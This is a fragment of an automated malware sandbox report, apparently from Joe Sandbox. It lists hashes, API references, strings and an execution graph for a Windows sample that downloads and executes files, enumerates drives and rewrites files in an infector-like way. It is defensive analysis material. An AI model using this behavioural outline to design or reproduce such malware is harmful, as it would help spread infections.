                                                    • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                    • Instruction ID: 3edc0b281db54301559854a5c5582b46f31bd40417fbe353b7944b2048984320
                                                    • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                    • Instruction Fuzzy Hash: 4641A171E006049BDB28DFA9D8856DEBBB7EF80360F2C952DE46597250D771DEC18B40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _fseek_malloc_memset
                                                    • String ID:
                                                    • API String ID: 208892515-0
                                                    • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                    • Instruction ID: 7914134e5544650cea924e7150ff0e38d9c45eeee6ce1a5dea08d37054b0517e
                                                    • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                    • Instruction Fuzzy Hash: AA418E7A600F018AD6708A2DEA007D6B2E69FC4325F190A2DF5A7C77D1E731E8C58A55
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                    • __isleadbyte_l.LIBCMT ref: 00415307
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                    • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                    • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                    • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00625523
                                                    • __isleadbyte_l.LIBCMT ref: 00625557
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00625588
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 006255F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                    • Instruction ID: 5a8eb6594d2767d8a70a8d80973f39a256f518d23c5ab07dddb635aa214f3596
                                                    • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                    • Instruction Fuzzy Hash: 60319E71610A65EFDB30DF64E8809FE3BB7AF01311B148569E466AB291E730DD50DF50
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                    • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                    • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                    • Instruction ID: 630412ef71719507bff09e9eb739216a5b410049197e7213327e72bb3811aa92
                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                    • Instruction Fuzzy Hash: 3B1180B200046EBBCF125E84EC45CEE3F23BB08354B198414FE1858230C33ACAB2AF85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @1B$smb
                                                    • API String ID: 0-1048219352
                                                    • Opcode ID: 220cb52bb67f9cc1e989785f0d4a1f299304cdd02844d79bd89321651b3e4c61
                                                    • Instruction ID: d630dca5f7a22d3065c2bbc73d982e6d0b3b174a2a36b9cbd2be297d36c493db
                                                    • Opcode Fuzzy Hash: 220cb52bb67f9cc1e989785f0d4a1f299304cdd02844d79bd89321651b3e4c61
                                                    • Instruction Fuzzy Hash: 48619071E14A2ADFDF14CFA4E4442ECB7B3EB98304F64802AD402AB284D7358986CF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @1B$smb
                                                    • API String ID: 0-1048219352
                                                    • Opcode ID: 6de6f73f2659c15c14e40a604a9aea409f769025fdd293e06b7135ec3210fe86
                                                    • Instruction ID: c5841c4a718e99be1ef55d4c2649cfeb2827ddbadad67399aaa8a43941501b3c
                                                    • Opcode Fuzzy Hash: 6de6f73f2659c15c14e40a604a9aea409f769025fdd293e06b7135ec3210fe86
                                                    • Instruction Fuzzy Hash: C3518C71E15A2ADFDB24CFA4E8442ECB7B3EB98304F24802AD406AB284D7748A41CF55
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ___mtold12
                                                    • String ID: @1B$smb
                                                    • API String ID: 3681297765-1048219352
                                                    • Opcode ID: cedb76b4b652808b226fda4037a4180b0cb43fde074a500196fe5c099d4840dd
                                                    • Instruction ID: 96b7b42242c8fa81b2ef7589f003e7b94331d6563d98ab97d7d24e8f14d92669
                                                    • Opcode Fuzzy Hash: cedb76b4b652808b226fda4037a4180b0cb43fde074a500196fe5c099d4840dd
                                                    • Instruction Fuzzy Hash: 45517A31E15A29DFDB14CFA4E4542ECB7B3EF98304F64802AD406AB284E7358A46CF55
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ___mtold12
                                                    • String ID: @1B$smb
                                                    • API String ID: 3681297765-1048219352
                                                    • Opcode ID: 97addeb9e2d42746322671f5fb4b5f50139b6d42c96d3f26c64e39c7d8616e15
                                                    • Instruction ID: a574a458f1b99419ec700550cdcff23134e4fe677a9391c57d3188cfef5ef8f9
                                                    • Opcode Fuzzy Hash: 97addeb9e2d42746322671f5fb4b5f50139b6d42c96d3f26c64e39c7d8616e15
                                                    • Instruction Fuzzy Hash: 11518E71D15A2ADBDF14CFA8E4542ECB7F2FF94300F64812AD406AB244E3358A46CF65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ___mtold12
                                                    • String ID: @1B$smb
                                                    • API String ID: 3681297765-1048219352
                                                    • Opcode ID: 5cfdfad485a6469f3dfdd4372f107155aa5a5b205b1f331aa346e88f6ec2bfe3
                                                    • Instruction ID: bdc1aab1128f21249d94275180fa36a118b2500df7539be38e30636d49f9e897
                                                    • Opcode Fuzzy Hash: 5cfdfad485a6469f3dfdd4372f107155aa5a5b205b1f331aa346e88f6ec2bfe3
                                                    • Instruction Fuzzy Hash: 0D513971E15A2ADBDF14CFA8E4402ECB7F2EF98304F64812AD416EB244E3399A45CF55
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ___mtold12
                                                    • String ID: @1B$smb
                                                    • API String ID: 3681297765-1048219352
                                                    • Opcode ID: 277e51857d88866ad4ad0ad011aa8d02abbb017eb32d7d8b7619f1eb2ad5a6eb
                                                    • Instruction ID: ced5140bff16c2a48b2ad8ba4ae76795dfba22e8613883c091e29d113bee3423
                                                    • Opcode Fuzzy Hash: 277e51857d88866ad4ad0ad011aa8d02abbb017eb32d7d8b7619f1eb2ad5a6eb
                                                    • Instruction Fuzzy Hash: C1513A71E15A2ADBDF14CFA8E4402ECB7F2EF98304F64812AD416EB244E3399A45CF55

                                                    Execution Graph

                                                    Execution Coverage:32.4%
                                                    Dynamic/Decrypted Code Coverage:8.9%
                                                    Signature Coverage:19.2%
                                                    Total number of Nodes:292
                                                    Total number of Limit Nodes:12
                                                    execution_graph 1004 f46076 1005 f4607b 1004->1005 1009 f460c7 1004->1009 1007 f460b0 VirtualAlloc 1005->1007 1005->1009 1016 f461b2 1005->1016 1006 f4615f VirtualFree 1006->1009 1007->1009 1008 f46198 VirtualFree 1008->1016 1009->1006 1009->1008 1010 f460d5 VirtualAlloc 1009->1010 1010->1009 1011 f46389 VirtualProtect 1014 f463b7 1011->1014 1012 f463fc VirtualProtect 1013 f46418 1012->1013 1014->1012 1015 f463e7 VirtualProtect 1014->1015 1015->1012 1015->1014 1016->1011 1017 f462fb 1016->1017 1018 f414e1 1019 f41541 1018->1019 1020 f414fd GetModuleHandleA 1018->1020 1023 f41573 1019->1023 1026 f41549 1019->1026 1021 f41512 1020->1021 1022 f4151a VirtualQuery 1020->1022 1021->1019 1022->1021 1029 f41638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1023->1029 1024 f41566 1026->1024 1046 f41af9 1026->1046 1027 f41579 ExitProcess 1030 f4167f 1029->1030 1031 f4167a 1029->1031 1052 f41718 GetSystemTimeAsFileTime 1030->1052 1064 f4139f GetVersionExA 1031->1064 1034 f41686 1035 f416ca 1034->1035 1041 f416a0 CreateThread 1034->1041 1036 f416d7 1035->1036 1037 f416d0 1035->1037 1039 f416dd lstrcpy 1036->1039 1040 f4170f 1036->1040 1085 f41581 1037->1085 1039->1027 1040->1027 1057 f42c48 memset 1041->1057 1301 f41099 1041->1301 1045 f41718 3 API calls 1045->1035 1047 f41b11 1046->1047 1048 f41b09 1046->1048 1050 f41b16 CreateThread 1047->1050 1051 f41b0f 1047->1051 1049 f41638 188 API calls 1048->1049 1049->1051 1050->1051 1320 f41638 189 API calls 1050->1320 1051->1024 1053 f41754 1052->1053 1054 f41735 SHSetValueA 1052->1054 1055 f4175a SHGetValueA 1053->1055 1056 f41786 __aulldiv 1053->1056 1054->1056 1055->1056 1056->1034 1091 f41973 PathFileExistsA 1057->1091 1060 f42cb2 1061 f416ba WaitForSingleObject 1060->1061 1062 f42cbb VirtualFree 1060->1062 1061->1045 1062->1061 1063 f42c8f CreateThread WaitForMultipleObjects 1063->1060 1113 f42b8c memset GetLogicalDriveStringsA 1063->1113 1065 f413cf LookupPrivilegeValueA 1064->1065 1066 f414da 1064->1066 1067 f413e7 1065->1067 1068 f413ef 1065->1068 1066->1030 1281 f4119f GetCurrentProcess OpenProcessToken 1067->1281 1068->1066 1286 f4120e GetModuleHandleA GetProcAddress 1068->1286 1074 f41448 GetCurrentProcessId 1074->1066 1075 f41457 1074->1075 1075->1066 1076 f41319 3 API calls 1075->1076 1077 f4147f 1076->1077 1078 f41319 3 API calls 1077->1078 1079 f4148e 1078->1079 1079->1066 1080 f41319 3 API calls 1079->1080 1081 f414b4 1080->1081 1082 f41319 3 API calls 1081->1082 1083 f414c3 1082->1083 1084 f41319 3 API calls 1083->1084 1084->1066 1300 f4185b GetSystemTimeAsFileTime srand rand srand rand 1085->1300 1087 f41592 wsprintfA wsprintfA lstrlen CreateFileA 1088 f41633 1087->1088 1089 f415fb WriteFile CloseHandle 1087->1089 1088->1040 1089->1088 1090 f4161d ShellExecuteA 1089->1090 1090->1088 1092 f419a0 1091->1092 1109 f41ac7 1091->1109 1093 f419af CreateFileA 1092->1093 1094 f419c4 Sleep 1093->1094 1095 f41a28 GetFileSize 1093->1095 1094->1093 1096 f419d5 1094->1096 1097 f41a80 1095->1097 1098 f41a38 1095->1098 1112 f4185b GetSystemTimeAsFileTime srand rand srand rand 1096->1112 1099 f41a96 1097->1099 1100 f41a8d FindCloseChangeNotification 1097->1100 1098->1097 1102 f41a3d VirtualAlloc 1098->1102 1104 f41a9c DeleteFileA 1099->1104 1105 f41aad 1099->1105 1100->1099 1102->1097 1103 f41a53 1102->1103 1103->1097 1107 f41a59 ReadFile 1103->1107 1104->1105 1105->1109 1111 f41ab8 VirtualFree 1105->1111 1106 f419da wsprintfA CopyFileA 1106->1095 1110 f41a0d CreateFileA 1106->1110 1107->1097 1107->1103 1109->1060 1109->1063 1110->1095 1110->1104 1111->1109 1112->1106 1114 f42c09 WaitForMultipleObjects 1113->1114 1117 f42bc8 1113->1117 1115 f42c3c 1114->1115 1116 f42c2a CreateThread 1114->1116 1116->1115 1124 f42845 1116->1124 1118 f42bfa lstrlen 1117->1118 1119 f42bd2 GetDriveTypeA 1117->1119 1120 f42be3 CreateThread 1117->1120 1118->1114 1118->1117 1119->1117 1119->1118 1120->1118 1121 f42b7d 1120->1121 1134 f429e2 memset wsprintfA 1121->1134 1271 f4274a memset memset SHGetSpecialFolderPathA wsprintfA 1124->1271 1126 f42853 1127 f42878 DeleteFileA 1126->1127 1130 f42692 8 API calls 1126->1130 1133 f4239d 186 API calls 1126->1133 1128 f4288c VirtualFree 1127->1128 1129 f4289a 1127->1129 1128->1129 1131 f428a4 CloseHandle 1129->1131 1132 f428ab 1129->1132 1130->1126 1131->1132 1133->1126 1135 f42abc memset memset FindFirstFileA 1134->1135 1136 f42a3a memset lstrlen lstrcpyn strrchr 1134->1136 1148 f428b8 memset wsprintfA 1135->1148 1136->1135 1137 f42a88 1136->1137 1137->1135 1139 f42a9a lstrcmpiA 1137->1139 1142 f42b74 1139->1142 1143 f42aad lstrlen 1139->1143 1141 f42b61 FindNextFileA 1144 f42b23 1141->1144 1145 f42b6d FindClose 1141->1145 1143->1135 1143->1139 1146 f42b35 lstrcmpiA 1144->1146 1147 f428b8 174 API calls 1144->1147 1145->1142 1146->1144 1146->1145 1147->1141 1149 f42905 1148->1149 1154 f42951 memset 1148->1154 1150 f42956 strrchr 1149->1150 1151 f4291b memset wsprintfA 1149->1151 1149->1154 1153 f42967 lstrcmpiA 1150->1153 1150->1154 1152 f429e2 180 API calls 1151->1152 1152->1154 1155 f42988 lstrcmpiA 1153->1155 1156 f4297a 1153->1156 1154->1141 1155->1154 1158 f42994 1155->1158 1166 f41e6e 1156->1166 1159 f429ad strstr 1158->1159 1160 f429a5 lstrcpy 1158->1160 1161 f429d3 1159->1161 1162 f429cb 1159->1162 1160->1159 1231 f42692 1161->1231 1209 f4239d strstr 1162->1209 1167 f41e7d 1166->1167 1240 f41df6 strrchr 1167->1240 1170 f41eb0 SetFileAttributesA CreateFileA 1171 f42332 1170->1171 1172 f41edf 1170->1172 1174 f42346 1171->1174 1175 f4233d UnmapViewOfFile 1171->1175 1245 f41915 1172->1245 1177 f42350 1174->1177 1178 f4234b FindCloseChangeNotification 1174->1178 1175->1174 1179 f42356 CloseHandle 1177->1179 1180 f42391 1177->1180 1178->1177 1179->1180 1180->1154 1181 f41f2e 1181->1171 1251 f41c81 1181->1251 1185 f41f92 1186 f41c81 2 API calls 1185->1186 1187 f41f9f 1186->1187 1187->1171 1188 f41af9 169 API calls 1187->1188 1189 f42024 1187->1189 1193 f41fc0 1188->1193 1189->1171 1190 f41af9 169 API calls 1189->1190 1191 f4207a 1190->1191 1192 f41af9 169 API calls 1191->1192 1197 f42090 1192->1197 1193->1171 1193->1189 1194 f41af9 169 API calls 1193->1194 1195 f41ffe 1194->1195 1196 f42013 FlushViewOfFile 1195->1196 1196->1189 1198 f420bb memset memset 1197->1198 1199 f420f5 1198->1199 1200 f41c81 2 API calls 1199->1200 1202 f421de 1200->1202 1201 f42226 memcpy UnmapViewOfFile FindCloseChangeNotification 1256 f41b8a 1201->1256 1202->1201 1204 f4226e 1264 f4185b GetSystemTimeAsFileTime srand rand srand rand 1204->1264 1206 f422ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1207 f41915 3 API calls 1206->1207 1208 f4231f FindCloseChangeNotification 1207->1208 1208->1171 1210 f42451 CreateFileA GetFileSize 1209->1210 1216 f423d8 1209->1216 1211 f42675 CloseHandle 1210->1211 1212 f42480 1210->1212 1213 f4267c RemoveDirectoryA 1211->1213 1212->1211 1214 f42499 1212->1214 1215 f42687 1213->1215 1217 f41915 3 API calls 1214->1217 1215->1154 1216->1210 1216->1215 1218 f424a4 9 API calls 1217->1218 1266 f4189d memset CreateProcessA 1218->1266 1221 f4255c Sleep memset wsprintfA 1222 f429e2 163 API calls 1221->1222 1223 f42597 memset wsprintfA Sleep 1222->1223 1224 f4189d 6 API calls 1223->1224 1225 f425e4 Sleep CreateFileA 1224->1225 1226 f41915 3 API calls 1225->1226 1227 f42610 CloseHandle 1226->1227 1227->1213 1228 f4261e 1227->1228 1228->1213 1229 f42641 SetFilePointer WriteFile 1228->1229 1229->1213 1230 f42667 SetEndOfFile 1229->1230 1230->1213 1232 f426b2 WaitForSingleObject 1231->1232 1233 f426a2 CreateEventA 1231->1233 1234 f426c1 lstrlen ??2@YAPAXI 1232->1234 1235 f42708 1232->1235 1233->1232 1236 f42736 SetEvent 1234->1236 1237 f426da lstrcpy 1234->1237 1235->1236 1238 f42718 lstrcpy ??3@YAXPAX 1235->1238 1236->1154 1239 f426f1 1237->1239 1238->1239 1239->1236 1241 f41e62 1240->1241 1242 f41e13 lstrcpy strrchr 1240->1242 1241->1170 1241->1171 1242->1241 1243 f41e40 lstrcmpiA 1242->1243 1243->1241 1244 f41e52 lstrlen 1243->1244 1244->1241 1244->1243 1246 f41928 1245->1246 1249 f41924 SetFilePointer CreateFileMappingA MapViewOfFile 1245->1249 1247 f4192e memset GetFileTime 1246->1247 1248 f4194f 1246->1248 1247->1249 1248->1249 1250 f41954 SetFileTime 1248->1250 1249->1171 1249->1181 1250->1249 1252 f41c9c 1251->1252 1254 f41c94 1251->1254 1253 f41cae memset memset 1252->1253 1252->1254 1253->1254 1254->1171 1255 f4185b GetSystemTimeAsFileTime srand rand srand rand 1254->1255 1255->1185 1262 f41b93 1256->1262 1258 f41bca srand 1259 f41bd8 rand 1258->1259 1260 f41c08 1259->1260 1260->1259 1261 f41c29 memset memcpy lstrcat 1260->1261 1261->1204 1262->1262 1265 f4185b GetSystemTimeAsFileTime srand rand srand rand 1262->1265 1264->1206 1265->1258 1267 f418e0 CloseHandle WaitForSingleObject 1266->1267 1268 f4190c 1266->1268 1269 f41907 CloseHandle 1267->1269 1270 f418fb GetExitCodeProcess 1267->1270 1268->1213 1268->1221 1269->1268 1270->1269 1280 f4185b GetSystemTimeAsFileTime srand rand srand rand 1271->1280 1273 f427b5 wsprintfA CopyFileA 1274 f42840 1273->1274 1275 f427de wsprintfA 1273->1275 1274->1126 1276 f41973 17 API calls 1275->1276 1277 f4280f 1276->1277 1278 f42820 CreateFileA 1277->1278 1279 f42813 DeleteFileA 1277->1279 1278->1274 1279->1278 1280->1273 1282 f411c6 AdjustTokenPrivileges 1281->1282 1283 f41200 CloseHandle 1281->1283 1284 f411f6 1282->1284 1285 f411f7 CloseHandle 1282->1285 1283->1068 1284->1285 1285->1283 1287 f41310 1286->1287 1288 f4123f GetCurrentProcessId OpenProcess 1286->1288 1287->1066 1295 f41319 1287->1295 1288->1287 1292 f41262 1288->1292 1289 f412b0 VirtualAlloc 1289->1292 1294 f412b8 1289->1294 1290 f412f1 CloseHandle 1290->1287 1291 f41302 VirtualFree 1290->1291 1291->1287 1292->1289 1292->1290 1293 f41296 VirtualFree 1292->1293 1292->1294 1293->1289 1294->1290 1296 f4134a 1295->1296 1297 f4132a GetModuleHandleA GetProcAddress 1295->1297 1298 f41351 memset 1296->1298 1299 f41363 1296->1299 1297->1296 1297->1299 1298->1299 1299->1066 1299->1074 1300->1087 1302 f41196 1301->1302 1303 f410ba 1301->1303 1303->1302 1319 f4185b GetSystemTimeAsFileTime srand rand srand rand 1303->1319 1305 f41118 wsprintfA wsprintfA URLDownloadToFileA 1306 f410dc 1305->1306 1307 f41168 lstrlen Sleep 1305->1307 1310 f41000 CreateFileA 1306->1310 1307->1303 1311 f41025 GetFileSize CreateFileMappingA MapViewOfFile 1310->1311 1312 f41092 WinExec lstrlen 1310->1312 1313 f41057 1311->1313 1314 f4107b 1311->1314 1312->1302 1312->1303 1315 f41074 UnmapViewOfFile 1313->1315 1318 f41061 1313->1318 1316 f41087 CloseHandle 1314->1316 1317 f4108d CloseHandle 1314->1317 1315->1314 1316->1317 1317->1312 1318->1315 1319->1305 1333 f42361 1334 f42374 1333->1334 1335 f4236b UnmapViewOfFile 1333->1335 1336 f42382 1334->1336 1337 f42379 CloseHandle 1334->1337 1335->1334 1338 f42391 1336->1338 1339 f42388 CloseHandle 1336->1339 1337->1336 1339->1338 1321 f4615d VirtualFree 1329 f460c7 1321->1329 1322 f46198 VirtualFree 1331 f461b2 1322->1331 1323 f460d5 VirtualAlloc 1323->1329 1324 f46389 VirtualProtect 1328 f463b7 1324->1328 1325 f463fc VirtualProtect 1326 f46418 1325->1326 1327 f4615f VirtualFree 1327->1329 1328->1325 1330 f463e7 VirtualProtect 1328->1330 1329->1322 1329->1323 1329->1327 1330->1325 1330->1328 1331->1324 1332 f462fb 1331->1332

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00F46076 22 Function_00F466C8 0->22 1 Function_00F41DF6 2 Function_00F42CF0 3 Function_00F46CF2 6 Function_00F46CF8 3->6 4 Function_00F41973 19 Function_00F4185B 4->19 5 Function_00F42B7D 11 Function_00F429E2 5->11 7 Function_00F41AF9 28 Function_00F41638 7->28 8 Function_00F42D60 9 Function_00F414E1 9->7 9->28 10 Function_00F42361 40 Function_00F42D9B 10->40 27 Function_00F428B8 11->27 12 Function_00F46B63 24 Function_00F46834 12->24 26 Function_00F469B0 12->26 29 Function_00F467A4 12->29 13 Function_00F41E6E 13->1 13->7 13->8 14 Function_00F41C68 13->14 13->19 31 Function_00F41915 13->31 13->40 45 Function_00F41C81 13->45 51 Function_00F41D8A 13->51 52 Function_00F41B8A 13->52 15 Function_00F417D0 16 Function_00F4615D 16->22 17 Function_00F4235D 18 Function_00F4605E 20 Function_00F42845 23 Function_00F4274A 20->23 32 Function_00F42692 20->32 33 Function_00F4239D 20->33 21 Function_00F42C48 21->4 48 Function_00F42B8C 21->48 41 Function_00F46A84 22->41 43 Function_00F46D00 22->43 47 Function_00F46B02 22->47 23->4 23->19 25 Function_00F46734 25->41 25->43 25->47 27->11 27->13 27->32 27->33 28->15 28->21 36 Function_00F4139F 28->36 37 Function_00F41718 28->37 38 Function_00F41099 28->38 46 Function_00F41581 28->46 30 Function_00F465A6 33->11 33->31 34 Function_00F4189D 33->34 35 Function_00F4119F 36->35 39 Function_00F41319 36->39 49 Function_00F4120E 36->49 37->2 38->19 42 Function_00F41000 38->42 41->3 50 Function_00F4680F 41->50 42->15 43->3 43->12 43->26 44 Function_00F46001 53 Function_00F4600A 44->53 46->19 47->12 48->5 48->20 52->19

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2257061197.0000000000F41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F40000, based on PE: true
                                                    • Associated: 00000001.00000002.2257040564.0000000000F40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257080377.0000000000F43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257101802.0000000000F44000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257122143.0000000000F46000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_f40000_IoUNtL.jbxd
                                                    Similarity
                                                    • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                    • String ID: %s*$C:\$Documents and Settings
                                                    • API String ID: 2826467728-110786608
                                                    • Opcode ID: 5ec39d8b4e639b86fe8dc00afa9c0dd8b6e2abd5f3a9a1a076fea49bba198bf6
                                                    • Instruction ID: fdf6eaf12bc8457080795d909e6c8896fdfcc54d211f788d8c5ccd54d4ec0378
                                                    • Opcode Fuzzy Hash: 5ec39d8b4e639b86fe8dc00afa9c0dd8b6e2abd5f3a9a1a076fea49bba198bf6
                                                    • Instruction Fuzzy Hash: A34195B2804349AFD760DFA4EC88DDB7BACEB95315F44093AFD44D3111E634D648A7A2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
